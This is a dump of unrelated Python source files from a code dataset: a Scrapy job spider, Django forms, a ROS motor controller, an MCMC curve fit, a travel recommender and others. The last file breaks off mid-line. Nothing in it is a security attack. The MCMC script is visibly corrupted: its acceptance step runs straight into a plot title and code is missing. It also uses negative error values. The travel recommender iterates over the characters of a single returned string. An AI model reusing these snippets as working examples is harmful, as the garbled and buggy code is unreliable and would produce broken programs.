self.clock.tick(self.fps)\n # self.playtime += milliseconds / 1000.0\n\n # self.draw_function()\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n test_view = TestView(900, 600, clear_colour=(0, 0, 0))\n test_view.run()\n","sub_path":"players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":33164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"348462650","text":"import numpy as np\nimport pandas as pd\nfrom cea.constants import HOURS_IN_YEAR\n\n\ndef calculate_incident_radiation(radiation, radiation_csv):\n \"\"\"\n Calculate the output file \"radiation_csv\" based on the radiation dataframe.\n :param radiation:\n :param radiation_csv:\n :return:\n \"\"\"\n\n # Import Radiation table and compute the Irradiation in W in every building's surface\n column_names = ['T%i' % (i + 1) for i in range(HOURS_IN_YEAR)]\n for column in column_names:\n # transform all the points of solar radiation into Wh\n radiation[column] = radiation[column] * radiation['Awall_all']\n\n # sum up radiation load per building\n # NOTE: this looks like an ugly hack because it is: in order to work around a pandas MemoryError, we group/sum the\n # columns individually...\n grouped_data_frames = {}\n for column in column_names:\n df = pd.DataFrame(data={'Name': radiation['Name'],\n column: radiation[column]})\n grouped_data_frames[column] = df.groupby(by='Name').sum()\n radiation_load = pd.DataFrame(index=grouped_data_frames.values()[0].index)\n for column in column_names:\n radiation_load[column] = grouped_data_frames[column][column]\n\n incident_radiation = np.round(radiation_load[column_names], 2)\n incident_radiation.to_csv(radiation_csv)\n\n return # total solar radiation in areas exposed to radiation in Watts\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--radiation-pickle', help='path to a pickle of the radiation dataframe')\n parser.add_argument('--radiation-csv', help='path to a pickle of the radiation dataframe')\n args = parser.parse_args()\n\n radiation = pd.read_pickle(args.radiation_pickle)\n calculate_incident_radiation(radiation, args.radiation_csv)\n","sub_path":"legacy/radiation_arcgis/calculate_incident_radiation.py","file_name":"calculate_incident_radiation.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"465625228","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2022/08/30 15:11\r\n# File: 0998.py\r\n# Desc: \r\n\r\n\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, val=0, left=None, right=None):\r\n# self.val = val\r\n# self.left = left\r\n# self.right = right\r\nclass Solution:\r\n def insertIntoMaxTree(self, root: Optional[TreeNode], val: int) -> Optional[TreeNode]:\r\n t = TreeNode(val)\r\n if root.val < val:\r\n t.left = root\r\n return t\r\n cur = root\r\n while cur:\r\n if not cur.right:\r\n cur.right = t\r\n break\r\n elif cur.right.val < val:\r\n t.left = cur.right\r\n cur.right = t\r\n break\r\n cur = cur.right\r\n return root\r\n","sub_path":"Solutions/0998/0998.py","file_name":"0998.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"586201108","text":"import time\nfrom neopixel import *\nimport argparse\n\n# LED strip configuration:\nLED_COUNT = 350 # Number of LED pixels.\nLED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).\n#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED_BRIGHTNESS = 180 # Set to 0 for darkest and 255 for brightest\nLED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53\nSTEP_SIZE = 28 # The size of a step in the unit of LED lights which will be lit up\n\n\ndef clearStrip(strip):\n #Clear all the lights on the strip\n for i in range(0, strip.numPixels(), 1):\n strip.setPixelColor(i, 0)\n strip.show()\n\ndef lightStep(strip, stepNum):\n clearStrip(strip)\n for i in range(stepNum * STEP_SIZE, stepNum * STEP_SIZE + STEP_SIZE, 1):\n if (i==0):\n strip.setPixelColor(i+8, Color(0, 128,0))\n else:\n strip.setPixelColor(i, Color(0, 128, 0))\n strip.show()\n\ndef lightIndv(strip, stepNum):\n clearStrip(strip)\n # For the first step light LEDs 0-35\n if (stepNum == 0):\n for i in range(0, 35, 1):\n strip.setPixelColor(i, Color(0, 128, 0))\n strip.show()\n \n else:\n for i in range(stepNum*STEP_SIZE+7, stepNum*STEP_SIZE+7 + STEP_SIZE, 1):\n strip.setPixelColor(i, Color(0, 128, 0))\n strip.show()\n\n\ndef flashVirginiaTech(strip, secs, wait_ms=500):\n #Flash every other light maroon and orage, then switch\n p = 0\n while p < secs:\n for i in range(0, strip.numPixels(), 1):\n if i % 2 == 0:\n strip.setPixelColor(i, Color(0, 128, 0))\n if i % 2 == 1:\n strip.setPixelColor(i, Color(128, 255, 0))\n strip.show()\n time.sleep(wait_ms/1000.0)\n for i in range(0, strip.numPixels(), 1):\n if i % 2 == 0:\n strip.setPixelColor(i, Color(128, 255, 0))\n if i % 2 == 1:\n strip.setPixelColor(i, Color(0, 128, 0))\n strip.show()\n time.sleep(wait_ms/1000.0)\n p += 1\n\n\n# Main program logic follows:\nif __name__ == '__main__':\n # Process arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')\n args = parser.parse_args()\n\n # Create NeoPixel object with appropriate configuration.\n strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)\n # Intialize the library (must be called once before other functions).\n strip.begin()\n\n print ('Press Ctrl-C to quit.')\n if not args.clear:\n print('Use \"-c\" argument to clear LEDs on exit')\n try:\n print(\"Let's try lighting up steps 1-10\\n\")\n for i in range(0, 10, 1):\n for x in range(0,10,1):\n print(\"Lighting step %d\", x)\n lightIndv(strip, x)\n time.sleep(500/1000.0)\n clearStrip(strip)\n\n #flashVirginiaTech(strip, 2)\n #clearStrip(strip)\n\n #x =2 \n #print(\"Turn on step {}\".format(x))\n #lightIndv(strip, x)\n #time.sleep(10)\n #clearStrip(strip)\n\n except KeyboardInterrupt:\n if args.clear == False:\n clearStrip(strip)\n\n\n","sub_path":"testLights.py","file_name":"testLights.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"295278790","text":"#Node Representation\nclass Node:\n\n #Constructor\n def __init__(self, state, parent_node, operator, depth, path_cost):\n self.state = state\n self.parent_node = parent_node\n self.operator = operator\n self.depth = depth\n self.path_cost = path_cost\n\n \n\n#Problem Formulation\nclass General_problem:\n\n #Constructor\n def __init__(self, initial_state, operators, goal_test):\n self.initial_state = initial_state\n self.operator = operators #List of available operators\n self.goal_test = goal_test\n self.path_cost = 0 #initial path cost always 0\n\n #Define General Successor Function that takes a node and returns (state, action) pairs possible resulting\n def successor_function(self, node):\n successors = [];\n return successors\n \n #Define General Cost Function that whenever we expand a node it updates its cost by adding the edge cost\n def path_cost_function(self, node):\n extra_cost = 0\n #Given a file name such us pathcosts\n text_name = input(\"Please Enter your file name: \")\n text_name = text_name +\".txt\"\n f = open(text_name, 'r')\n for i in f:\n #for each line in the file\n line = i.split()\n #read the distance between the node and its parent node line[2]\n if (line[0] == node.parent_node.state and line[1] == node.state) or (line[1] == node.parent_node.state and line[0] == node.state):\n extra_cost = int(line[2])\n break\n #add the cost of getting to that state from the previous state to the total path cost leading to the parent node\n return extra_cost + node.parent_node.path_cost\n","sub_path":"General.py","file_name":"General.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"99172945","text":"\"\"\"\nThis spider is a ApprenticeshipVacancy spider created on top of the ATSSpider\nscrapy crawl apprenticeshipvacancy -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://apprenticeshipvacancymatchingservice.lsc.gov.uk/navms/Forms/Vacancy/SearchVacancy.aspx\"\n\nsample url:\n https://apprenticeshipvacancymatchingservice.lsc.gov.uk/navms/Forms/Vacancy/SearchVacancy.aspx\n\"\"\"\n\nfrom urlparse import urljoin\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.selector import Selector\nfrom urlparse import urlparse\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, NormalizedJoin, ConvertDateString\nfrom brightcorp.lib.utils import get_hidden_inputs\n\n\nclass ApprenticeshipVacancy(ATSSpider):\n\n name = \"apprenticeshipvacancy\"\n ref_re = r'(\\d+)$'\n page = 0\n download_delay = 0.3\n tot_pages = ''\n is_first_page = True\n\n def parse(self, response):\n formdata = get_hidden_inputs(response)\n formdata['ctl00$ContentBody$SearchByRadioButtonList'] = 'Occupation'\n formdata['ctl00$ContentBody$ApprenticeshipOccupationDropDownList'] = '0'\n formdata['ctl00$ContentBody$ApprenticeshipFrameworkListBox'] = '0'\n formdata['ctl00$ContentBody$ApprenticeshiptypeOldValue'] = '999'\n formdata['ctl00$ContentBody$ApprenticeshipCategoryRadioButtonList'] = '0'\n formdata['ctl00$ContentBody$ApprenticeshiptypeDropDownList'] = '999'\n formdata['ctl00$ContentBody$SearchButton'] = 'Search'\n req = FormRequest(\n response.url, formdata=formdata, callback=self.parse_jobs_list\n )\n yield req\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n if not self.tot_pages:\n tot_pages = sel.xpath(\n '//select[contains(@name, \"PagesDropDownList\")]/option[1]/text()'\n ).re(self.ref_re)\n if tot_pages:\n self.tot_pages = tot_pages[0]\n\n jobs = sel.xpath('//table[@class=\"results\"]//tr[td]')\n for job in jobs:\n job_url = job.xpath('./td[1]/a/@href').extract()\n if job_url:\n job_url = urljoin(response.url, job_url[0])\n meta = {\n 'title': job.xpath('./td[1]/a//text()').extract(),\n 'loc': job.xpath('./td[3]/span/text()').extract(),\n 'cat': job.xpath('./td[4]/text()').extract(),\n 'date': job.xpath('./td[5]/text()').extract(),\n }\n yield Request(\n job_url, callback=self.parse_job_callback(), meta=meta\n )\n\n if self.is_first_page and self.tot_pages:\n self.is_first_page = False\n for i in xrange(1, int(self.tot_pages) + 1, 1):\n formdata = get_hidden_inputs(response)\n formdata['ctl00$ContentBody$ResultsPager$PagesDropDownList'] = str(i)\n yield FormRequest(\n response.url, callback=self.parse_jobs_list, formdata=formdata\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('location', response.meta.get('loc'))\n loader.add_value('jobcategory', response.meta.get('cat'))\n loader.add_value(\n 'expiration_date', response.meta.get('date'), ConvertDateString('%d/%m/%Y')\n )\n loader.add_value(\n 'referencenumber', response.url,\n Prefix('%s-' % self.name), re=self.ref_re\n )\n\n loader.add_xpath('baseSalary', '//p[@id=\"vacancy-wage\"]/text()')\n loader.add_xpath('workhours', '//p[@itemprop=\"workHours\"]/text()')\n loader.add_xpath('requirements', '//section[@id=\"course-info\"]/node()')\n loader.add_xpath('duration', '//p[@id=\"vacancy-expected-duration\"]/text()')\n loader.add_xpath(\n 'description',\n [\n '//h2[text()=\"Apprenticeship summary\"]|//div[@itemprop=\"responsibilities\"]',\n '//h2[text()=\"Traineeship details\"]|//h2[text()=\"Traineeship details\"]/following-sibling::div[1]'\n ]\n )\n loader.add_xpath(\n 'responsibilities',\n '//h2[text()=\"Training provider\"]|//h2[text()=\"Training provider\"]/following-sibling::div[1]'\n )\n loader.add_xpath(\n 'company',\n [\n '//p[@id=\"vacancy-employer-name\"]/text()',\n '//h3[text()=\"Training provider\"]/following-sibling::p[1]/text()'\n ]\n )\n loader.add_xpath(\n 'company_description',\n '//h2[text()=\"About the employer\"]|//h2[text()=\"About the employer\"]/following-sibling::div[1]',\n NormalizedJoin()\n )\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/apprenticeshipvacancy.py","file_name":"apprenticeshipvacancy.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"635090837","text":"from django import forms\nfrom django.urls import reverse\nfrom django.forms import Textarea,CheckboxSelectMultiple\n\nfrom .models import Post, Comment, Profile\nfrom django.contrib.auth import get_user_model\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Div, Layout, Submit\nfrom crispy_forms.bootstrap import InlineField\n\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django_registration.forms import RegistrationFormCaseInsensitive, RegistrationFormTermsOfService\n\nclass CrispyModelForm(forms.ModelForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(CrispyModelForm, self).__init__(*args, **kwargs)\n\t\tself.helper = FormHelper(self)\n\nclass CrispyForm(forms.Form):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(CrispyForm, self).__init__(*args, **kwargs)\n\t\tself.helper = FormHelper(self)\n\nclass PostForm(CrispyModelForm):\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = ['title','entry','private','show_recent']\n\t\tlabels = {\n\t\t\t'show_recent': 'Show on Front Page',\n\t\t\t'private': 'Visibility'\n\t\t}\n\nclass CommentForm(CrispyModelForm):\n\tclass Meta:\n\t\tmodel = Comment\n\t\tfields = ['entry']\n\t\tlabels = {\n\t\t\t'entry': ''\n\t\t}\n\t\twidgets = {\n\t\t\t'entry': Textarea(attrs={'cols': 40, 'rows': 4})\n\t\t}\n\nclass ConfirmDeleteForm(CrispyForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(ConfirmDeleteForm, self).__init__(*args, **kwargs)\n\t\tself.helper.add_input(Submit('submit', 'Cancel', css_class='btn-secondary'))\n\t\tself.helper.add_input(Submit('submit', 'Delete', css_class='btn-primary'))\n\nclass UserForm(CrispyModelForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(UserForm, self).__init__(*args, **kwargs)\n\t\tself.helper.form_tag = False\n\n\tclass Meta:\n\t\tmodel = get_user_model()\n\t\tfields = ['last_name','email']\n\t\tlabels = {\n\t\t\t'last_name': 'Name',\n\t\t\t'email': 'Email Address'\n\t\t}\n\nclass UserProfileForm(CrispyModelForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(UserProfileForm, self).__init__(*args, **kwargs)\n\t\tself.helper.form_tag = False\n\t\tself.helper.add_input(Submit('submit', 'Save', css_class='btn-primary'))\n\n\tclass Meta:\n\t\tmodel = Profile\n\t\tfields = ['profile','avatar','banner']\n\nclass PasswordChangeForm(PasswordChangeForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.helper = FormHelper(self)\n\t\tself.helper.add_input(Submit('submit', 'Change Password', css_class='btn-primary'))\n\nclass UploadFilesForm(CrispyForm):\n\tfiles = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(UploadFilesForm, self).__init__(*args, **kwargs)\n\t\tself.helper.form_tag = False\n\t\tself.helper.form_show_labels = False\n\nclass CreateFolderForm(CrispyForm):\n\tnew_folder = forms.CharField(strip=True)\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(CreateFolderForm, self).__init__(*args, **kwargs)\n\t\tself.helper.form_tag = False\n\t\tself.helper.form_show_labels = False\n\nclass FileRenameForm(forms.Form):\n\told_name = forms.CharField(strip=True)\n\tnew_name = forms.CharField(strip=True)\n\nclass FileDeleteForm(forms.Form):\n\tdelete = forms.CharField(strip=True)\n\nclass RegistrationForm(RegistrationFormCaseInsensitive, RegistrationFormTermsOfService):\n\tpass\n\nbulk_actions = [\n\t('visible_only_me','Set Visible to Only Me'),\n\t('visible_registered','Set Visible to Registered Users'),\n\t('visible_regular','Set Visible to Regular Users'),\n\t('visible_public','Set Visible to Public'),\n\t('visible_staff','Set Visible to Staff'),\n\t('delete','Delete Posts (NO UNDO)'),\n]\n\nclass UserManagePostsForm(CrispyForm):\n\tposts = forms.ModelMultipleChoiceField(queryset=None,widget=CheckboxSelectMultiple)\n\taction = forms.ChoiceField(choices=bulk_actions)\n\tdef __init__(self, user, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.fields['posts'].queryset = Post.posts_visible(user).filter(user=user)\n\t\tself.helper.form_tag = False\n\t\tself.helper.field_template = 'bootstrap4/layout/inline_field.html'\n\t\tself.helper.layout = Div(Layout(\n\t\t\t\tInlineField('action', css_class='flex-grow-1'),\n\t\t\t\tSubmit('submit', 'Update Posts', css_class='btn-primary ml-3'),\n\t\t),css_class='form-inline justify-content-end')\n\nfrom django.utils import timezone\nclass UserManagePostsByDateForm(CrispyForm):\n\tolder_than = forms.DateTimeField(initial=timezone.now)\n\taction = forms.ChoiceField(choices=bulk_actions)\n\tconfirm = forms.BooleanField(initial=False, required=True)\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.helper.add_input(Submit('submit', 'Update Posts', css_class='btn-primary'))\n","sub_path":"user/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"645055301","text":"#!/usr/bin/env python\n\n\"\"\"\n#The differential controller script is responsible sending velocity commands\n#to the Arduino that controls de DC Motors. Here the Twist message coming from \n#the teleop device is converted into MotorCommand message used by the Arduino.\n\"\"\"\n\nimport rospy\nfrom deepfind_package.msg import MotorCommand\nfrom geometry_msgs.msg import Twist\n\n# Motor global variables \nglobal dict\ndict = {'MOTOR_CAP': 40, 'FORWARD': 0, 'BACKWARD': 1}\n\n# Converts incoming Twist message to Motorommand message and\n# sends the command to the Arduino.\ndef diff_control_callback(twistData):\n command = MotorCommand()\n command.leftMotorPower = int((twistData.linear.x + twistData.angular.z) * dict['MOTOR_CAP'])\n command.rightMotorPower = int((twistData.linear.x - twistData.angular.z) * dict['MOTOR_CAP'])\n\n if command.leftMotorPower > 0:\n \tcommand.leftMotorDirection = dict['FORWARD']\n else:\n command.leftMotorDirection = dict['BACKWARD']\n \n if command.rightMotorPower > 0:\n command.rightMotorDirection = dict['FORWARD']\n else:\n command.rightMotorDirection = dict['BACKWARD']\n\n command.leftMotorPower = abs(command.leftMotorPower)\n command.rightMotorPower = abs(command.rightMotorPower)\n \t\n pub = rospy.Publisher('motor_speed', MotorCommand, queue_size = 10)\n pub.publish(command)\n\n# Main function, waits for new Twist messages to arrive\n# Creates node and subscriber\ndef diff_controller_listener():\n rospy.init_node('differential_controller')\n rospy.Subscriber('cmd_vel', Twist, diff_control_callback)\n rospy.spin()\n\nif __name__ == '__main__':\n diff_controller_listener()\n\n\n","sub_path":"catkin_ws/src/deepfind_package/scripts/diff_motor_controller.py","file_name":"diff_motor_controller.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"636744835","text":"import numpy as np\nimport matplotlib.pyplot as plt\ndef model(x, a, b, c):\n return a*np.square(x) + b*x + c\n\ndef loglikelihood(x_obs, y_obs, sigma_y_obs, a, b, c):\n d = y_obs - model(x_obs, a, b, c)\n d = d/sigma_y_obs\n d = -0.5 * np.sum(d**2)\n return d\n\ndef logprior(a, b, c):\n p = -np.inf\n if -3 < a < -0.5 and -3 < b < 3 and -1 < c < 10 :\n p = 0.0\n return p\n\nx_obs = np.array([-2.0,1.3,0.4,5.0,0.1, -4.7, 3.0, -3.5,-1.1])\ny_obs = np.array([ -1.931, 2.38, 1.88, -24.22, 3.31, -21.9, -5.18, -12.23, 0.822])\nsigma_y_obs = np.array([ 2.63, 6.23, -1.461, 1.376, -4.72, 1.313, -4.886, -1.091, 0.8054]) \n\nN = 50000\nlista_a = np.zeros(N)\nlista_b = np.zeros(N)\nlista_c = np.zeros(N)\nlogposterior = np.zeros(N)\n\nlista_a[0] = np.random.uniform(-3, -0.5)\nlista_b[0] = np.random.uniform(-3, 3)\nlista_c[0] = np.random.uniform(-1, 10)\ni = 0\nlogposterior[0] = loglikelihood(x_obs, y_obs, sigma_y_obs, lista_a[i-1], lista_b[i-1], lista_c[i-1]) + logprior(lista_a[i-1], lista_b[i-1], lista_c[i-1])\n\nsigma_delta_c = 0.1\nsigma_delta_b = 0.08\nsigma_delta_a = 0.05\n\n#### DATOS\nfor i in range(1,N):\n propuesta_a = np.random.normal(loc=lista_a[i-1], scale=sigma_delta_a)\n propuesta_b = np.random.normal(loc=lista_b[i-1], scale=sigma_delta_b)\n propuesta_c = np.random.normal(loc=lista_c[i-1], scale=sigma_delta_c)\n\n logposterior_viejo = loglikelihood(x_obs, y_obs, sigma_y_obs, lista_a[i-1], lista_b[i-1], lista_c[i-1]) + logprior(lista_a[i-1], lista_b[i-1], lista_c[i-1])\n logposterior_nuevo = loglikelihood(x_obs, y_obs, sigma_y_obs, propuesta_a, propuesta_b, propuesta_c) + logprior(propuesta_a, propuesta_b, propuesta_c)\n\n r = min(1,np.exp(logposterior_nuevo-logposterior_viejo))\n alpha = np.random.random()\n if(alpha={a_model:.4f}$\")\n\nplt.subplot(1, 3, 2)\nplt.hist(lista_b, bins=40, density = True)\nplt.xlabel(\"$b$\")\nplt.title(f\"$={b_model:.4f}$\")\n\nplt.subplot(1, 3, 3)\nplt.hist(lista_c, bins=40, density = True)\nplt.xlabel(\"$c$\")\nplt.title(f\"$={c_model:.4f}$\")\nplt.tight_layout()\n#plt.savefig(\"individual_histograms.pdf\", dpi = 200)\n\nplt.figure(figsize=(12, 7))\nxplot = np.linspace(x_obs.min(), x_obs.max(), 100)\ny_model = model(xplot, a_model , b_model, c_model)\n\nplt.errorbar(x_obs,y_obs, yerr=sigma_y_obs, fmt='o', label = \"Data\")\nplt.plot(xplot, y_model, label = f\"Model: $y = {a_model:.3f}x^2 + {b_model:.3f}x + {c_model:.3f}$\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.legend(loc = 'best')\nplt.savefig(\"results_plot.pdf\", dpi = 200)\nplt.show()","sub_path":"Exercises/Ejercicio 6/DanielOchoa_Ejercicio6.py","file_name":"DanielOchoa_Ejercicio6.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"24174591","text":"from zope.pagetemplate import pagetemplatefile, engine\nfrom zope.app.pagetemplate import viewpagetemplatefile\n\nclass Context(engine.ZopeContextBase):\n def translate(self, msgid, domain=None, mapping=None, default=None):\n return i18n.translate(\n msgid, domain, mapping, context=self.principal, default=default)\n\nclass ZopeEngine(engine.ZopeEngine):\n _create_context = Context\n def getContext(self, __namespace=None, **namespace):\n if __namespace:\n if namespace:\n namespace.update(__namespace)\n else:\n namespace = __namespace\n\n context = self._create_context(self, namespace)\n\n # Put principal into context so path traversal can find it\n if 'principal' in namespace:\n context.principal = namespace['principal']\n\n # Put context into context so path traversal can find it\n if 'context' in namespace:\n context.context = namespace['context']\n\n return context\n\nEngine = engine._TrustedEngine(ZopeEngine())\n\nclass AppPT(object):\n def pt_getEngine(self):\n return Engine\n\nclass PageTemplateFile(AppPT, pagetemplatefile.PageTemplateFile):\n\n def __init__(self, filename, _prefix=None):\n _prefix = self.get_path_from_prefix(_prefix)\n super(PageTemplateFile, self).__init__(filename, _prefix)\n\n def pt_getContext(self, instance, **_kw):\n # instance is object with 'context' and 'principal' atttributes.\n namespace = super(PageTemplateFile, self).pt_getContext(**_kw)\n namespace['view'] = instance\n namespace['context'] = context = instance.context\n return namespace\n\n def __call__(self, instance, *args, **keywords):\n namespace = self.pt_getContext(\n instance=instance, args=args, options=keywords)\n s = self.pt_render(\n namespace,\n showtal=getattr(instance, 'showTAL', 0),\n sourceAnnotations=getattr(instance, 'sourceAnnotations', 0),\n )\n return s\n\n def __get__(self, instance, type):\n return viewpagetemplatefile.BoundPageTemplate(self, instance)\n","sub_path":"zc.notification/trunk/src/zc/notification/requestless.py","file_name":"requestless.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"425344626","text":"destinations = [\"Paris, France\", \"Shanghai, China\", \"Los Angeles, USA\", \"Sao Paulo, Brazil\", \"Cairo, Egypt\"]\ntest_traveler = ['Erin Wilkes', 'Shanghai, China', ['historical site','art']]\n#To obtain the index of a particular destination in the destinations list \ndef get_destination_index(destination):\n for i in range(len(destinations)):\n if( destinations[i] == destination):\n destination_index = i\n return destination_index\n\n#print(get_destination_index(\"Los Angeles, USA\"))\n#print(get_destination_index(\"Hyderabad, India\")) \n#print(destinations.index(\"Hyderabad, India\"))\n\n#to get the index of the location of the traveller(current location)\ndef get_traveler_location(traveler):\n traveler_destination = traveler[1] #as traveller is a list containing name of the traveller, location and interests.\n traveler_destination_index = get_destination_index(traveler_destination)\n return traveler_destination_index\n#example of how to use get_traveler_location with traveler -'test_traveler' which is defined above\ntest_destination_index = get_traveler_location(test_traveler)\n#print(test_destination_index ) #location of test_traveler is printed on terminal\n\n#defining a list of attractions. This list will contain sublists containing each of the attractions present in a destination, hence the range is len()+1\nattractions = [[] for i in range(len(destinations)+1)]\n#print(attractions)- will print a list containing 5 empty sublists as 5 is the no of destinations in total\n\n#The following function adds attraction(s) to a particular destination\ndef add_attraction(destination, attraction):\n destination_index = get_destination_index(destination) \n \n attractions_for_destinations = attractions[destination_index]\n attractions_for_destinations.append(attraction)\n return \n\nadd_attraction(\"Los Angeles, USA\", [\"Venice Beach\", [\"beach\"]])\n#print(attractions)\nadd_attraction(\"Paris, France\", [\"the Louvre\", [\"art\", \"museum\"]])\nadd_attraction(\"Paris, France\", [\"Arc de Triomphe\", [\"historical site\", \"monument\"]])\nadd_attraction(\"Shanghai, China\", [\"Yu Garden\", [\"garden\", \"historcical site\"]])\nadd_attraction(\"Shanghai, China\", [\"Yuz Museum\", [\"art\", \"museum\"]])\nadd_attraction(\"Shanghai, China\", [\"Oriental Pearl Tower\", [\"skyscraper\", \"viewing deck\"]])\nadd_attraction(\"Los Angeles, USA\", [\"LACMA\", [\"art\", \"museum\"]])\nadd_attraction(\"Sao Paulo, Brazil\", [\"So Paulo Zoo\", [\"zoo\"]])\nadd_attraction(\"Sao Paulo, Brazil\", [\"Ptio do Colgio\", [\"historical site\"]])\nadd_attraction(\"Cairo, Egypt\", [\"Pyramids of Giza\", [\"monument\", \"historical site\"]])\nadd_attraction(\"Cairo, Egypt\", [\"Egyptian Museum\", [\"museum\"]])\n#print(attractions)\n\ndef find_attractions(destination, interests): #this function attractions in a particular destination based on your interests\n destination_index = get_destination_index(destination)\n attractions_in_city = attractions[destination_index]\n attraction_with_interests = []\n possible_attraction = []\n attraction_tags = []\n #return interests\n #return attractions_in_city\n for attraction in attractions_in_city:\n possible_attraction=attraction\n attraction_tags=attraction[1]\n #return possible_attraction, attraction_tags, interests\n for interest in interests:\n for tag in attraction_tags:\n if(tag == interest):\n attraction_with_interests.append(possible_attraction[0])\n return attraction_with_interests[0]\n#print(find_attractions('Shanghai, China', ['art', 'museum']))\n\ndef get_attractions_for_traveler(traveler): #main engine which would give you your recommendations according to your desired destinantion and interests\n interests_string = 'a'\n traveler_destination = traveler[1]\n traveler_interests = traveler[2]\n traveler_attractions = find_attractions(traveler_destination, traveler_interests)\n interests_string = 'Hi '+ traveler[0] +', we think you will like these places around '+ traveler_destination + ': '\n for attraction in traveler_attractions:\n interests_string = interests_string + attraction \n interests_string = interests_string \n \n \n return interests_string + \".\"\n\n\n#Enter your information here. I know you need a GUI coz u a rich kid but I a noob so I built this, will add GUI in the future.\nHarsimrat_kohli = get_attractions_for_traveler(['Harsimrat Kohli', 'Paris, France', ['monument']])\nprint(Harsimrat_kohli)\n\n \n \n \n \n \n \n \n \n \n \n\n\n\n\n\n\n\n \n \n\n\n\n\n \n \n\n \n\n","sub_path":"Desktop/Python codes/Boredless_tourist.py","file_name":"Boredless_tourist.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"603812169","text":"def bubble(ls):\n for i in range(len(ls)-1):\n j=0\n while jls[j+1][0] or(ls[j][0]==ls[j+1][0] and ls[j][1]>ls[j+1][1]):\n ls[j],ls[j+1]=ls[j+1],ls[j]\n j=j+1\n for i in range(len(ls)):\n for j in range(len(ls[i])):\n ls[i][j]=ls[i][j]+1\n return ls\n\ndef canmove(ls):\n n=ls[0]\n m=ls[1]\n canleft=True\n canright=True\n canup=True\n candown=True\n if m==0:\n canleft=False\n if canleft and not barrier.__contains__([n,m-1]):\n return True\n if m==M-1:\n canright=False\n if canright and not barrier.__contains__([n,m+1]):\n return True\n if n==0:\n canup=False\n if canup and not barrier.__contains__([n-1,m]):\n return True\n if n==N-1:\n candown=False\n if candown and not barrier.__contains__([n+1,m]):\n return True\n return False\n\n\nnums=input().split(\" \")\nN=int(nums[0])\nM=int(nums[1])\nbarrier=[]\nfor i in range(N):\n s=input()\n for j in range(M):\n if s[j]=='#':\n barrier.append([i,j])\n#i+j偶数为黑点,奇数为白点\neven=[]\nodd=[]\ncant=[]#不能走的点\nprint(barrier)\nfor i in range(N):\n for j in range(M):\n if not barrier.__contains__([i,j]):\n if not canmove([i,j]):\n cant.append([i,j])\n else:\n if (i+j)%2==0:\n even.append([i,j])\n else:\n odd.append([i,j])\nresult=[]+cant\nif len(even)>len(odd):\n result=result+even\nelif len(odd)>len(even):\n 